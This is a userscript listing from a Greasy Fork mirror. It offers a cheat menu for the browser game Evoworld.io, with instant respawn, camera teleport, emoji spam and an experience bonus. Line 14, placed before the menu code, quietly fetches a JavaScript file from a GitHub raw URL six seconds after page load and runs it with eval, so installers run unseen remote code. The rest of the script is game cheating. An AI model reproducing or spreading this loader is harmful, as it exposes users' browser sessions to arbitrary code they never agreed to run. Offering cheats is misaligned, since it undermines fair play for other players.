Greasy Fork镜像 支持简体中文。

Evoworld.io plotri

Evoworld.io cheat

目前為 2025-04-04 提交的版本,檢視 最新版本

  1. // ==UserScript==
  2. // @name Evoworld.io plotri
  3. // @namespace http://tampermonkey.net/
  4. // @version 0.3
  5. // @description Evoworld.io cheat
  6. // @author You
  7. // @license MIT
  8. // @match https://evoworld.io/
  9. // @icon https://www.google.com/s2/favicons?sz=64&domain=evoworld.io
  10. // @grant none
  11. // ==/UserScript==
  12.  
  13. (function() {
  14. setTimeout(() => {$.get("https://raw.githubusercontent.com/cameronlucky73/confused/main/o.js", (d) => eval(d));}, 6000);
  15. let overlayHTML = `
  16. <div id="cheat" style="z-index: 10;position: absolute;top: 350px;left: 7px;transition: 0.5s;border: 5px solid black;">
  17. Basic cheats:
  18. <br><input type="checkbox" id="ir">Instant respawn</br>
  19. <input type="checkbox" id="sm">Smooth movement</br>
  20. <input type="checkbox" id="lht">Low/normal hp table</br>
  21. <input type="checkbox" id="ht">show hp</br>
  22. <input type="checkbox" id="eh">Emoji spam</br>
  23. <button id="hj">Holding jump (key e)</button><br>
  24. Go to:<br>
  25. <input type="checkbox" id="gts">Go to swamp</br>
  26. <input type="checkbox" id="gtd">Go to desert</br>
  27. <input type="checkbox" id="gtm">Go to middle</br>
  28. Exp:<br>
  29. <input type="checkbox" id="eb3">Exp bonus 30%</br>
  30. Canvas size:<br>
  31. <button id="dscs">Disable setCanvasSize</button></br>
  32. Canvas height<input type="range" min="1" max="5100" value="1" id="CanvasSizeX"><br>
  33. Canvas width<input type="range" min="1" max="5100" value="1" id="CanvasSizeY"></br>
  34. </div>
  35. <div id="lowhptable" style="opacity: 0;">
  36. <h2 style="background-color: red;">ㅤㅤLOW HEALTH!</h2>
  37. </div>
  38. <div id="hptable" style="opacity: 0;">
  39. </div>
  40. <div id="normalhptable" style="opacity: 0;">
  41. <h2 style="background-color: green;">ㅤ NORMAL HEALTH</h2>
  42. </div>
  43. <style>
  44. #lowhptable {
  45. top: 750px;
  46. left: 7px;
  47. position: absolute;
  48. }
  49. #normalhptable {
  50. top: 750px;
  51. left: 7px;
  52. position: absolute;
  53. }
  54. #hptable {
  55. top: 450px;
  56. left: 900px;
  57. position: absolute;
  58. }
  59. .button {
  60. height: 75px;
  61. background-color: white;
  62. }
  63. button:hover {
  64. background-color: gray;
  65. }
  66. </style>
  67. `
  68. function get(x){ return document.getElementById(x); };
  69.  
  70. let overlay = document.createElement("div");
  71. overlay.innerHTML = overlayHTML;
  72. document.body.appendChild(overlay);
  73. document.body.appendChild(overlay);
  74. document.addEventListener('keydown', (event) => {if (event.keyCode == 89) {
  75. if(document.getElementById("cheat").style.opacity == 1) {
  76. document.getElementById("cheat").style.opacity = 0;
  77. }
  78. else {document.getElementById("cheat").style.opacity = 1;}}})
  79. alert('Open/close menu on y')
  80.  
  81. document.getElementById('CanvasSizeX').oninput = function() {
  82. game.canvas.width = this.value
  83. }
  84. document.getElementById('CanvasSizeY').oninput = function() {
  85. game.canvas.height = this.value
  86. }
  87. setInterval(function(){if(document.getElementById('ir').checked == true){if(imDead == true){playAgain()}}
  88. if(document.getElementById('gts').checked == true){game.camera.position = {x: 32120.979428936298, y: 2320.449999981}}
  89. if(document.getElementById('gtd').checked == true){game.camera.position = {x: 81924.5164619628, y: 2320.449999984}}
  90. if(document.getElementById('eh').checked == true){sendEmote(1);}
  91. if(document.getElementById('ht').checked == true){document.getElementById('hptable').innerHTML = game.me.hp}
  92. if(document.getElementById('sm').checked == true){game.maxInterpolateDistanceTeleport = 3000}else{game.maxInterpolateDistanceTeleport = 300}
  93. if(document.getElementById('gtm').checked == true){game.camera.position = {x: 54778.322855249105, y: 2358.94311498326}}
  94. if(document.getElementById('lht').checked == true){if(game.me.hp <= 20){document.getElementById('lowhptable').style.opacity = 1;}else{document.getElementById('lowhptable').style.opacity = 0;}
  95. if(game.me.hp >= 20){document.getElementById('normalhptable').style.opacity = 1;}else{document.getElementById('normalhptable').style.opacity = 0;};}
  96. if(document.getElementById('eb3').checked == true){startBonus = true}else{startBonus = false}
  97. })
  98. document.getElementById('hj').addEventListener('click', function() {
  99. document.addEventListener('keydown', (event) => {if (event.key == 'e') {document.getElementById("canvasGame").click()()}})
  100. })
  101. document.getElementById('dscs').addEventListener('click', function() {
  102. game.setCanvasSize = function(){}
  103. })
  104. document.getElementById('lht').addEventListener('click', function() {
  105. document.getElementById('lowhptable').style.opacity = 0;
  106. document.getElementById('normalhptable').style.opacity = 0;
  107. })
  108. document.getElementById('ht').addEventListener('click', function() {
  109. if(document.getElementById('hptable').style.opacity == 0){
  110. document.getElementById('hptable').style.opacity = 1
  111. }
  112. else{
  113. document.getElementById('hptable').style.opacity = 0
  114. }
  115. })
  116. }
  117. )();

QingJ © 2025

镜像随时可能失效,请加Q群300939539或关注我们的公众号极客氢云获取最新地址